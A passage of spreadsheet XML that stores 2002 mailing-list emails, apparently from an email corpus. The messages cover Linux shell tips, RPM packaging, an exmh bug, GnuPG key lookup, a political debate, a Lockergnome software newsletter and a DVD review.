 &gt;  exactly what you want!   so what is happening??
 &lt;contrition&gt;
   Oops.
 &lt;/contrition&gt;
 Um, my test was to tee to a fifo I didn't read from... resulting in the other
 reader hanging around forever.... not realising that never-opened-for-reading
 and opened-and-later-closed might be different.  Sensible behaviour has now been
 observed.
 &gt;  incidently, if your shell and system both support process
 &gt;  redirection, you could do the above as a one-liner.  syntax
 &gt;  varies depending on the shell, but in bash(1) and ksh(1):
 &gt; 
 &gt;      lav2yuv capture.avi | yuvdenoise | \
 &gt;          tee &gt;(mpeg2enc different blah blah) | mpeg2enc blah blah
 mpeg2enc generates stats during the run, so I give each one an xterm.
 Thanks,
 Ronan
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The green man
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381141,215/
 Date: 2002-09-30T03:05:02+01:00
 It is eight years since botanist David Bellamy made a TV series. What went 
 wrong, asks *Simon Hattenstone*.Quizzes[1]| Crossword[2]| Interactive guides
 [3]| Steve Bell[4]| Weblog[5]*Other news and comment**'Biggles Airways' plan 
 to put RAF into tourism business*[6]
 [1] http://www.newsisfree.com/quiz/0,7476,349695,00.html
 [2] http://www.newsisfree.com/crossword/0,4406,180778,00.html
 [3] http://www.newsisfree.com/interactive/0,2759,192055,00.html
 [4] http://www.newsisfree.com/cartoons/0,7371,337484,00.html
 [5] http://www.newsisfree.com/weblog/0,6798,517233,00.html
 [6] http://www.newsisfree.com/military/story/0,11816,801625,00.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: alsa-driver.spec tweak for homemade kernels
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Gary wrote :
 &gt; On Wed, Oct 02, 2002 at 10:09:19AM +0200, Matthias Saou wrote:
 &gt; &gt; Well, I don't really find it consistent at all to use an rpm package
 &gt; &gt; built against something that wasn't installed through rpm :-/
 &gt; 
 &gt; Following that reasoning, I've been installing all my custom-built
 &gt; kernels through rpm recently. I find it annoying, though, that 
 &gt; alsa-kernel, and similar packages, will only build for the currently 
 &gt; running kernel.
 &gt; 
 &gt; So I've attached a patch to specify an alternate kernel by setting the
 &gt; "TARGET_KERNEL" environment variable before running rpmbuild. You
 &gt; still need to have the rpm for the specified kernel installed, but at
 &gt; least it doesn't have to be currently running. It's kinda hackish, so
 &gt; if someone has a better way to do this, let me know.
 That idea looks good although it maybe needs to be tweaked a bit more (what
 you sent doesn't support packages named "kernel-smp"). I'd also prefer a
 cleaner way than the env variable, and preferrably not editing the spec...
 probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?
 The BuildRequires on "kernel-source" will also need to be removed because
 it won't necessarily need to be true, and that does bug me a bit :-/
 More ideas are welcome.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 Load : 0.08 0.06 0.03
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] find the biggest file
</t>
  </si>
  <si>
    <t xml:space="preserve">Inn Share &lt;shareinnn@yahoo.com&gt; writes:
 &gt; Hi,all:
 &gt; 
 &gt; Does anyone know how to list the biggest file in my
 &gt; root directory?or the second biggest ..etc...
 &gt; 
 &gt; Because I want to find out what is the reason cause my
 &gt; root all most full.
 find / -xdev -type f -exec du -sk {} \; | sort -rn | head -5
         -xdev will stop find recursing into other filesystems.
 Cheers
 Tiarnan
 -- 
 Tiarnn  Corrin
 Consultant / System Administrator
 CMG Wireless Data Solutions Ltd.
 Tel.: +353 21 4933200
 Fax: +353 21 4933201
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The Curse of India's Socialism
</t>
  </si>
  <si>
    <t xml:space="preserve">I think that this and other articles confuse Socialism with 
 Bureaucracy.  Libertarianism as implemented in North America is not 
 exactly the shining pinnacle of economic efficiency.
 Just try starting a telephone company in the US or (even worse) 
 Canada.  It can take a year or more to get the blessing of our own 
 "Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
 socialist leaning Canada, Industry Canada and the CRTC).
 Yet, despite all of this intense regulation and paper pushing, as 
 well as regulatory scrutiny by the FTC, SEC, and IRS, the 
 executives of Telecom Companies have managed to bilk the investment 
 community for what looks to be tens of billions of dollars.  They 
 finished their routine with the a quadruple lutz -- laying off 
 hundreds of thousands of workers when it all came crashing down.
 So.. tell me again.. how are we better off?
 -Ian.
 On Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:
 The Mystery of Capital: Why Capitalism Triumphs in the West and Fails
 Everywhere Else -- by Hernando De Soto	
 Is something I'm reading now.
 My impression is that France is not anywhere near the "Permit Raj"
 nightmare that India is (and became).  Nor has its market been closed
 like India's has.
 But De Soto's work is perhaps just as important or more so.  He hasn't
 dealt specifically with India, but I recall examples from Peru,
 Philippines, and Egypt.  In Lima, his team took over a year (I think it
 was 2) working 8 hr days to legally register a 1 person company.  In the
 Philippines, getting legal title can take 20 years.  In Egypt, about 80%
 of the population in Cairo lives in places where they are officially
 illegal.
 India hasn't been helped by its socialism.  Socialism has certainly
 helped strangle the country in permits.  But perhaps De Soto is right
 that the real crippling thing is keeping most of the people out of the
 legal, official property system.
 Putting most of the people in the property system was something the west
 only finished about 100 years ago, or Japan did 50 years ago.  It wasn't
 easy, but we live in a society that doesn't even remember we did it.
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Robert
 Harley
 Sent: Tuesday, August 20, 2002 11:24 AM
 To: fork@spamassassin.taint.org
 Subject: Re: The Curse of India's Socialism
 RAH quoted:
 Indians are not poor because there are too many of them; they are
 poor
 because there are too many regulations and too much government
 intervention
 -- even today, a decade after reforms were begun. India's greatest
 problems
 arise from a political culture guided by socialist instincts on the
 one
 hand and an imbedded legal obligation on the other hand.
 Nice theory and all, but s/India/France/g and the statements hold just
 as true, yet France is #12 in the UN's HDI ranking, not #124.
 Since all parties must stand for socialism, no party espouses
 classical liberalism
 I'm not convinced that that classical liberalism is a good solution
 for countries in real difficulty.  See Joseph Stiglitz (Nobel for
 Economics) on the FMI's failed remedies.  Of course googling on
 "Stiglitz FMI" only brings up links in Spanish and French.  I guess
 that variety of spin is non grata in many anglo circles.
 http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Lockergnome Windows Daily]  Brilliant Mistakes
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/daily/20020710.html"&gt;
       http://www.lockergnome.com/issues/daily/20020710.html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&lt;/style&gt;&lt;title&gt;20020710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href="http://www.qksrv.net/click-471546-5032686"&gt;&lt;img src="http://www.qksrv.net/image-471546-5032686" width="468" height="60" alt="DDR Memory at Crucial.com" border="0"&gt;&lt;/a&gt;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07.10.2002 GnomeREPORT &lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;WE NEED YOU TO BE AT GNOMEDEX!&lt;/b&gt; That's what your employer should be telling you. Microsoft Pocket PC experts will be sharing tips on improving workplace productivity with portable devices. Combined with Proxim's on location wireless networking solutions, the Pocket PC can keep you and your co-workers communicating no matter where you are in the building. Learn how to bring Wi-FI and PDA technologies together for the ultimate in portable computing. &lt;a href="http://www.gnomedex.com"&gt;Register for Gnomedex today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 Last week, &lt;a href="http://www.axialis.com/"&gt;Axialis Software&lt;/a&gt;
 released IconWorkshop v5.0 - arguably the most powerful icon
 editor / manager for the Windows platform. Ever the icon addict, I
 asked for your pixel-perfect creations. I have yet to receive one.
 Perhaps you've been waiting for the right motivation? How about a
 nice little contest involving some of the most powerful sites on
 the Internet? Here's the deal: you create five (or more) icons
 between now and the end of July 2002, upload them to your [FREE]
 DeviantArt account (under Contests / Axialis Icon Contest), and
 one of the five judges may pick it. The panel includes: myself,
 MattEO from &lt;a href="http://www.deviantart.com/"&gt;DeviantArt&lt;/a&gt;,
 KarmaGirl from &lt;a href="http://www.wincustomize.com/"&gt;WinCustomize&lt;/a&gt;, Voodoo from
 &lt;a href="http://www.neowin.net/"&gt;Neowin&lt;/a&gt;, and Marc from
 Axialis. We'll each pick our favorite set. The winners will not
 only receive one copy of IconWorkshop Corporate Edition, but some
 of their icons will get bundled with a future version of the
 software! Ownership is retained by the original author, so don't
 hold back. Here's your chance at fame and fortune. Or, at least
 fame and free software.
 &lt;p&gt;
 Ah, the life of a software junkie! Pieter just released the new
 (unofficial) &lt;a href="http://www.frysianfools.com/ggsearch/"&gt;Google SearchTool&lt;/a&gt;
 today. It's much more convenient than the official toolbar (sorry,
 I just don't like browser add-ons). I also gave
 &lt;a href="http://www.outertech.com/product.php?product=3"&gt;Cacheman&lt;/a&gt;
 another go; I haven't used it since Windows 98. It's always been a
 great piece of shareware, but I didn't realize it was THIS good.
 The speed increase has been quite noticeable (even on Storm Shadow,
 my P4 2.5GHz machine). Outer Technologies is brilliant. And so is
 &lt;a href="http://www.repligator.com/"&gt;Repligator 9.0&lt;/a&gt;. It gives
 me access to instant special effects - a one-stop shop for digital
 photo fun. I'm still debating whether or not to install the latest
 Java runtimes. It seems to be unobtrusive on my test machine,
 which is good to see; I don't want browser integration, I just
 wanna run that awesome ASCII Art program. Oh, and "12 Mistakes
 Executives Make When Planning Web Strategy" is available for FREE
 with the purchase of ANY &lt;a href="http://www.gnometomes.com/"&gt;GnomeTome&lt;/a&gt; (including our 50
 freshly-released OS X tips). Go grab it if your boss doesn't know
 as much as s/he should.
 &lt;p&gt;
 There's a little bit of Oingo Boingo on &lt;a href="http://mp3.lockergnome.com/"&gt;Emusic&lt;/a&gt; now. They inked a
 deal with Universal Music Group today - and I'm not paying any
 more to get access to even &lt;a href="http://mp3.lockergnome.com/"&gt;more MP3s&lt;/a&gt;. This is the ONLY
 way to go, and I hope and pray that more record labels will
 eventually catch on to the craze. The Internet is more than a
 place for a pseudo-interactive pamphlet; the Internet fosters
 knowledge; the Internet is still in its infancy; the Internet has
 encouraged creativity and commerce. The one thing the Internet is
 NOT: a fad. Its potential is limitless, as long as it remains
 flexible and not controlled by any one company. This
 &lt;a href="http://zdnet.com.com/2100-1107-941111.html"&gt;Palladium&lt;/a&gt;
 thing has got me more than a little spooked. It, combined with the
 service-oriented OS, could very well be the thing that drives
 people away from the Windows platform in droves (as much as I hate
 to admit it). Software and music pirates unwittingly created DRM.
 I best not find out that you're part of the problem.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&lt;B&gt;Groone's Recipe Holder v1.1.0 [8.2M] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.groonesworld.com/rholder.htm"&gt;http://www.groonesworld.com/rholder.htm&lt;/A&gt;
 &lt;P&gt;
 {Recipe lister} The best thing about this recipe holder? The
 conversion calculator. I've always wondered how many teaspoons
 were in a gallon. There are a few delicious recipes already
 included, to help you start your collection of favorites.
 Everything is nicely divided into categories, too. Need a salad?
 Then click &amp;quot;Soups &amp;amp; Salads.&amp;quot; (Easy!) You can also make shopping
 lists. The printing capability is nice too, since I'm assuming
 most of you don't keep your computer next to the stove. &amp;quot;If you
 have an up-to-date computer with Win2000, XP, or 98SE with the
 latest version of IE, then you can download the version with no
 runtime support since your computer has all the necessary files.&amp;quot;
 &lt;p&gt;&lt;br&gt;
 &lt;B&gt;SolarInfo v1.0 [1.1M] FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.sulaco.co.za/downloads.htm"&gt;http://www.sulaco.co.za/downloads.htm&lt;/A&gt;
 &lt;P&gt;
 {Sun, moon, and planets} Why is it all the other planets have
 really cool names for their respective moon(s), but Earth's is
 simply referred to as &amp;quot;moon?&amp;quot; We should change it to something
 catchier, like &amp;quot;Joey Joe-Joe Junior Shabbadu.&amp;quot; Don't mind me, I
 was just looking at this new application. It shows a graphical
 representation of every planet in our solar system (as opposed to
 every planet in the Hoth system) and its moons. It also provides
 detailed information such as the planet's distance from the sun,
 its volume, mass, and gravity in relation to Earth. What I found
 most interesting was how long a single &amp;quot;day&amp;quot; lasts on different
 planets. Did you know one day on Pluto is equal to six days on
 Earth? I guess he chased Chip and Dale around the Christmas tree
 for longer than we thought.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Outlook 2002, without a server!" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;!-- SYSTEM --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeSYSTEM&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;TightVNC v1.2.4 [660k] W9x/2k/XP FREE&lt;/b&gt;
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.tightvnc.com/"&gt;http://www.tightvnc.com/&lt;/A&gt;
 &lt;P&gt;
 &amp;quot;VNC (an abbreviation for Virtual Network Computing) is a great
 client / server software package allowing remote network access to
 graphical desktops. With VNC, you may allow yourself to access
 your machine from everywhere provided that your machine is
 connected to the Internet. VNC is free (released under the GNU
 General Public License) and it's available on most platforms. The
 original VNC distribution can be obtained at the AT&amp;amp;T research
 labs site. Here you can find enhanced version of VNC, called
 TightVNC (grown from the VNC Tight Encoder project), which is
 optimized to work over slow network connections such as low-speed
 modem links. While original VNC may be very slow when your
 connection is not fast enough, with TightVNC you can work remotely
 almost in real time in most environments. Besides bandwidth
 optimizations, TightVNC also includes many other improvements,
 optimizations and bug fixes over VNC.&amp;quot;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size="1"&gt;&lt;B&gt;Full PDF Books&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001829.html"&gt;Poor Richard's Web&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001827.html"&gt;Internet Promotions&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001804.html"&gt;E-Mail Publishing&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001830.html"&gt;Web Site Makeover&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001803.html"&gt;Websites Made Easy&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001825.html"&gt;Online Communities&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001826.html"&gt;Home Networking&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001828.html"&gt;Internet Recruiting&lt;/A&gt;&lt;BR&gt;
 &lt;A HREF="http://www.gnometomes.com/tome/001824.html"&gt;Online Branding&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;B&gt;Pop-Up Menu Navigation Software&lt;/b&gt;
     &lt;br&gt;Scribbled by Pat Wong
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://popup.jscentral.com/"&gt;http://popup.jscentral.com/&lt;/A&gt;
 &lt;P&gt;
 I found some really cool software to generate Web site navigation
 menus, and I thought you might be interested in learning about it.
 There are several examples on the company's site, as well as on my
 own. Here's a small write-up about it; perhaps you'd be interested
 in running this in a future Lockergnome issue? We've all seen a
 lot of really cool site navigation menus, with pop-up text, neat
 mouseover effects, and the like. Most of them require a
 combination of HTML and JavaScript to build, which is expertise
 that goes way beyond some of us. At last, it's possible to easily
 generate just such a menu with some very user-friendly screens to
 enter the data you want to use.
 &lt;P&gt;
 Pop-Up Menu comes in a freeware version, or you can get a fully
 licensed version ($34.95 for a Home User license / $129.95 for the
 Web Designer license). The biggest difference? With the licensed
 version, you get the ability to save a menu you've generated so
 you can modify it later. Your only alternative, if you want to
 make even a simple change to a menu generated by the freeware
 version, is to create the whole menu again from scratch (or diving
 into the nuts and bolts of the code and modifying that). Be
 forewarned: The JavaScript reads like a novel, so modifying that
 could potentially be a nightmare. I decided to buy the fully
 licensed version and I'm really glad I did. Sorry if I sound like
 a commercial for the company; I don't work for them or stand to be
 compensated in any way for recommending them. I just think this
 menu system is the greatest thing to come along in a while.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 class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Avoid intruders in your online space:&lt;/b&gt; Our choice to protect your privacy! Complete browsing security. Clear cache, cookies, history and more with the click of your mouse. Leave no telltale tracks behind!" Get a virtual Panic Button for your PC! &lt;a href="http://hop.clickbank.net/?lgnome/panicware"&gt;Try it today&lt;/a&gt;!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#FFCC99" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeFAVORITE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;B&gt;Calculator&lt;/b&gt;
     &lt;br&gt;Unearthed by a Gnomie
 &lt;P&gt;
  &lt;A CLASS=URL HREF="http://www.calculator.com/"&gt;http://www.calculator.com/&lt;/A&gt;
 &lt;P&gt;
 {Calculate it} Calculators aren't just for adding and subtracting
 numbers or spelling silly phrases by turning the calculator upside
 down. How about figuring out the financing on your new car? What
 about the seeding rates for your wheat farm? Perhaps you
 programmers out there need a nice HEX calculator. And, of course,
 what football fan wouldn't like to calculate the passing rates for
 his or her favorite quarterback? If it seems like I'm all over the
 map here, it's because this site provides links to all kinds of
 calculator sites for all kinds of people. Trust me: it all adds up
 to a unique and useful site.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size="1"&gt;&lt;B&gt;Our Tip eBooks&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#FFEEDD"&gt;&lt;font style="font-size: 8pt" face="Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000628.html"&gt;Microsoft Office Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000627.html"&gt;PC Productivity Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000626.html"&gt;Cool Internet Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000625.html"&gt;Windows 2000 Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" href="http://www.gnometomes.com/tome/000623.html"&gt;Windows XP Tips&lt;/a&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001106.html"&gt;Top 50 Fun Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001104.html"&gt;Must-Know Terms&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001105.html"&gt;Top 50 Useful Sites&lt;/A&gt;&lt;BR&gt;
 &lt;a target="_blank" HREF="http://www.gnometomes.com/tome/001099.html"&gt;Top 75 Tech Sites&lt;/A&gt;&lt;BR&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 Who knows how to thwart false charges? Lockergnomie Steve
 Lafferty: &amp;quot;In a recent article over the PayPal issue, it was
 stated that when using a credit card illegally, the owner of that
 card is responsible for the first $50.  However, sometging that
 very few people know about is that there is a US Federal provision
 in the banking industry called 'Reg E' (Regulation E / Electronic
 Funds Transfer). This stipulates that all transactions will err in
 favor of the customer (account holder). This means that if your
 'bank card' is used without your permission, you are not
 responsible for any of the charges. My suggestion is never to use
 a credit card - and only use your bank debit card. That way, if
 someone steals your number, you are not liable for any of the
 charges.&amp;quot; For more information, please refer to Section 205 on
 FEDERALRESERVE.GOV. Obviously, this tip only applies to people
 living in the USA. If you haven't been watching your statements
 like a hawk lately, you'd be wise to start soon. Identity theft is
 a growing concern. When my wallet was stolen, I found
 IDENTITYTHEFT.ORG to be a godsend.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href="http://www.lockergnome.com/issues/daily/20020710.html"&gt;http://www.lockergnome.com/issues/daily/20020710.html&lt;/a&gt;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HREF="http://www.gnomedex.com/"&gt;$99 Tech Conference&lt;/A&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;center&gt;
 &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;&lt;img alt="See You in August!" src="http://chris.pirillo.com/archives/Gnomedex_Banner_going.gif" width="120" height="60" border="0"&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;p&gt;
 &amp;nbsp;&lt;a href="http://store.lockergnome.com"&gt;The GnomeSTORE&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Tell a Friend About Us!&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/submit.html"&gt;Suggest a Feature&lt;/a&gt;&lt;br&gt;
 &amp;nbsp;&lt;a href="http://www.lockergnome.com/advertise.html"&gt;Advertise With Us&lt;/a&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&lt;table cellpadding="0" cellspacing="0" border="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;MP3 SOFTWARE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=548557/"&gt;Havas MP3 Pro&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=234527/"&gt;Magix MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=278075/"&gt;Ejay MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=468032/"&gt;Audiostation 5.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=588415/"&gt;Jack The MP3 Ripper&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=599956/"&gt;Pearson MP3 Maker&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=472433/"&gt;Steinberg My MP3&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=555517/"&gt;MusicMatch Jukebox 7.0&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=20635/"&gt;Hip Hop E-jay Record&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=393896/"&gt;MP3-Wolf&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=409500/"&gt;MP3 Maker Gold&lt;/A&gt;&lt;BR&gt;
 &lt;A target="_blank" HREF="http://lockergnome.pricegrabber.com/search_getprod.php/masterid=273932/"&gt;The MP3 Wizard&lt;/A&gt;&lt;BR&gt;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the story of the ugly shoe unfold before our very eyes. This footwear was outcast from the group weeks ago, and has been very depressed ever since. Pity my shoe.
 &lt;p&gt;
 &lt;a href="http://images.lockergnome.com/images/video/lone.shoe.WMV"&gt;The Lone Shoe&lt;/a&gt;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Brilliant Mistakes --&gt;
 Exercise extends your life by ten years, but you spend 15 of them doing it.
 &lt;/font&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Any of your writing online anywhere?  Would love to take a look.  I was 
 plagued with night terrors for years and tried to capture that feeling 
 after waking up (if you want to call that waking up), but was never able 
 to...
 Cindy
 On Mon, 9 Sep 2002, Eirikur Hallgrimsson wrote:
 &gt; On Monday 09 September 2002 09:51 pm, Geege Schuman wrote
 &gt; &gt; ever notice how the feelings evoked in some dreams stick with you all
 &gt; &gt; day?i'm sure it's some neurochemical process initiated during the dream
 &gt; &gt; that is still cycling thru - like a deja vu, triggered by memory
 &gt; &gt; processes, where &gt; you don't actually remember but you feel like you're
 &gt; &gt; remembering.
 &gt; 
 &gt; Absolutely, and I've wanted to recapture it.  I've done some writing based 
 &gt; on dreams, and there is a mysterious "mood" to that feeling that drives 
 &gt; some creative stuff for me.  I've never tried to write music in that 
 &gt; state, but I will next time.
 &gt; 
 &gt; Eirikur
 &gt; 
 &gt; 
 &gt; 
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Another bug
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; &gt; &gt; My feeling of this is that we really do not want to have a 
 &gt; &gt; &gt; Ftoc_ClearCurrent, but rather just a RescanLine and the caller had 
 &gt; &gt; &gt; better know the line or msgid. That routine shoud just put in the '+' 
 &gt; &gt; &gt; if the line/msg in question happened to be the cur msg. Thoughts?
 &gt; &gt; 
 &gt; &gt; Intuitively, that sounds right to me.  It does also call "tag remove", so 
 &gt; &gt; you'll have to make sure that gets set correctly as well.
 &gt; &gt; 
 &gt; &gt; I think any changes that make it behave more intuitively are a good thing even 
 &gt; &gt; if they mean we have something else to fix.  Of course, that attitude is why 
 &gt; &gt; I've been fixing exmh bugs for 3 weeks.
 &gt; 
 I have a version that's working now. I'll try it a couple of days and 
 check it during daylight. Basically I added an agument to 
 ClearCurrent and updated all callers to slap in $ftoc(curLine). I 
 also flipped the order in  Msg_Change to ClearCurrent $prevline after 
 the Mh_SetCur. For some reason it barfs when Marking many messages 
 Unread. I'll check that tomorrow.
 G'night.
 /Anders
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: SChoolHouseRocks DVD
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Of course they had to do this AFTER we purcahsed these all on vhs, and yes
 it is now run by the great evil empire known as disney...but we got the
 new School House Rocks DVD anyway and man is it an amazing item.
 First off , my 8 year old has been singing them since she was 6. Second
 off, these are much easier to rip to divx and mp3. Third, new songs,
 remastered originals and other dvd goodies. Its a 2 dvd set so its well
 worth the 17$ we paid for it.
 Even if you dont have kids, run do not walk to pick this one up.
 Man, I would sure love to have a *nix Rocks for the kids.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: ARRRGHHH Had GPG working, now it doesnt.
</t>
  </si>
  <si>
    <t xml:space="preserve">If you haven't already, you should enable the debug log under
 Hacking Support preferences and look for clues there.
 &gt;&gt;&gt;Reg Clemens said:
  &gt; &gt; Hi,
  &gt; &gt; 
  &gt; &gt; On Sun, 01 Sep 2002 00:05:03 MDT Reg Clemens wrote: 
  &gt; &gt;   
  &gt; &gt; [...]
  &gt; &gt; &gt; in messages with GnuPG signatures.  But punching the line ALWAYS
  &gt; &gt; &gt; gives
  &gt; &gt; &gt; 
  &gt; &gt; &gt;         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key ID BDD
      F997A
  &gt; &gt; &gt;         Can't check signature: public key not found
  &gt; &gt; &gt; 
  &gt; &gt; &gt; So, something else is missing.
  &gt; &gt; 
  &gt; &gt; Yes, the public key of the signature you want to check :-).
  &gt; &gt; 
  &gt; &gt; Are you really sure that you have the public key of the message's
  &gt; &gt; signature? If not, try downloading it or try to check a signature from
  &gt; &gt; which you know you have the public key.
  &gt; &gt; 
  &gt; &gt; 
  &gt; &gt; 
  &gt; 
  &gt; Ah, sorry for not making that clearer.
  &gt; But no.
  &gt; Previously (v1.0.6 of GnuPG) there would be a slight pause at this point whi
      le
  &gt; it went out to get the public key from a keyserver.
  &gt; Now, whether I have the key or NOT, I get the failure message.
  &gt; 
